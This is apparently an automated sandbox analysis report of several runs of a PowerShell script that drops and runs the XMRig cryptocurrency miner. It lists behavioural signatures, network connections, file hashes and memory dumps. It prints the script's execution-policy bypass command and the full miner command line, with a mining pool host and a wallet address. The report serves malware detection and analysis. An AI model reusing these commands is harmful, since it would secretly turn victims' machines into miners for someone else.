N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Network

N/A

Files

memory/2396-4-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp

memory/2396-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

memory/2396-7-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2396-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

memory/2396-8-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2396-9-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2396-10-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2396-11-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

memory/2396-12-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:29

Platform

win11-20240419-en

Max time kernel

1799s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/784-0-0x00007FF8651F3000-0x00007FF8651F5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3j2qs10.osf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/784-6-0x00000269C8340000-0x00000269C8362000-memory.dmp

memory/784-10-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

memory/784-11-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

memory/784-12-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

memory/784-14-0x00000269C8530000-0x00000269C8542000-memory.dmp

memory/784-15-0x00000269C8520000-0x00000269C852A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3816-46-0x000001B7AF950000-0x000001B7AF970000-memory.dmp

memory/3816-47-0x000001B7B1140000-0x000001B7B1160000-memory.dmp

memory/3816-48-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/784-49-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

memory/784-51-0x00007FF8651F3000-0x00007FF8651F5000-memory.dmp

memory/3816-50-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/784-52-0x00007FF8651F0000-0x00007FF865CB2000-memory.dmp

memory/3816-53-0x000001B7B1160000-0x000001B7B1180000-memory.dmp

memory/3816-54-0x000001B7B1180000-0x000001B7B11A0000-memory.dmp

memory/3816-55-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-56-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-57-0x000001B7B1160000-0x000001B7B1180000-memory.dmp

memory/3816-58-0x000001B7B1180000-0x000001B7B11A0000-memory.dmp

memory/3816-59-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-60-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-61-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-62-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-63-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-64-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-65-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-66-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-67-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-68-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-69-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-70-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-71-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-72-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-73-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-74-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-75-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-76-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-77-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-78-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-79-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-80-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-81-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-82-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-83-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-84-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-85-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-86-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-87-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-88-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-89-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-90-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-91-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-92-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-93-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-94-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-95-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-96-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-97-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-98-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-99-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-100-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-101-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-102-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-103-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-104-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-105-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-106-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-107-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-108-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-109-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-110-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-111-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-112-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-113-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-114-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-115-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-116-0x00007FF611C40000-0x00007FF612873000-memory.dmp

memory/3816-117-0x00007FF611C40000-0x00007FF612873000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:34

Platform

win7-20240221-en

Max time kernel

1563s

Max time network

1563s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Network

N/A

Files

memory/2324-4-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

memory/2324-5-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/2324-8-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2324-7-0x0000000001E70000-0x0000000001E78000-memory.dmp

memory/2324-6-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2324-9-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2324-10-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2324-11-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2324-12-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:58

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
NL 23.62.61.160:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 160.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

memory/1316-0-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/1316-3-0x0000019BCF8D0000-0x0000019BCF8F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxq30kwp.xb0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1316-11-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1316-12-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1316-14-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/1316-16-0x0000019BCF920000-0x0000019BCF92A000-memory.dmp

memory/1316-15-0x0000019BD0650000-0x0000019BD0662000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4276-47-0x0000023F76C60000-0x0000023F76C80000-memory.dmp

memory/4276-48-0x0000023F78780000-0x0000023F787A0000-memory.dmp

memory/4276-49-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-51-0x0000023F787C0000-0x0000023F787E0000-memory.dmp

memory/4276-50-0x0000023F787A0000-0x0000023F787C0000-memory.dmp

memory/1316-53-0x00007FFA4C3A3000-0x00007FFA4C3A5000-memory.dmp

memory/4276-52-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/1316-54-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4276-55-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/1316-56-0x00007FFA4C3A0000-0x00007FFA4CE61000-memory.dmp

memory/4276-57-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-59-0x0000023F787C0000-0x0000023F787E0000-memory.dmp

memory/4276-58-0x0000023F787A0000-0x0000023F787C0000-memory.dmp

memory/4276-60-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-61-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-62-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-63-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-64-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-65-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-66-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-67-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-68-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-69-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-70-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-71-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-72-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-73-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-74-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-75-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-76-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-77-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-78-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-79-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-80-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-81-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-82-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-83-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-84-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-85-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-86-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-87-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-88-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-89-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-90-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-91-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-92-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-93-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-94-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-95-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-96-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-97-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-98-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-99-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-100-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-101-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-102-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-103-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-104-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-105-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-106-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-107-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-108-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-109-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-110-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-111-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-112-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-113-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-114-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-115-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-116-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-117-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp

memory/4276-118-0x00007FF64B8F0000-0x00007FF64C523000-memory.dmp